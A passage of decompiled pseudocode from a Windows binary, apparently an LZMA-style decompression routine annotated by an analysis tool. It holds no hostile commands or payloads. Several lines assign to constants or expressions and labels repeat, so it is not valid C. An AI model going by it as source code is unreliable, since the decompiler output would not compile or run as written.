				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8));
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
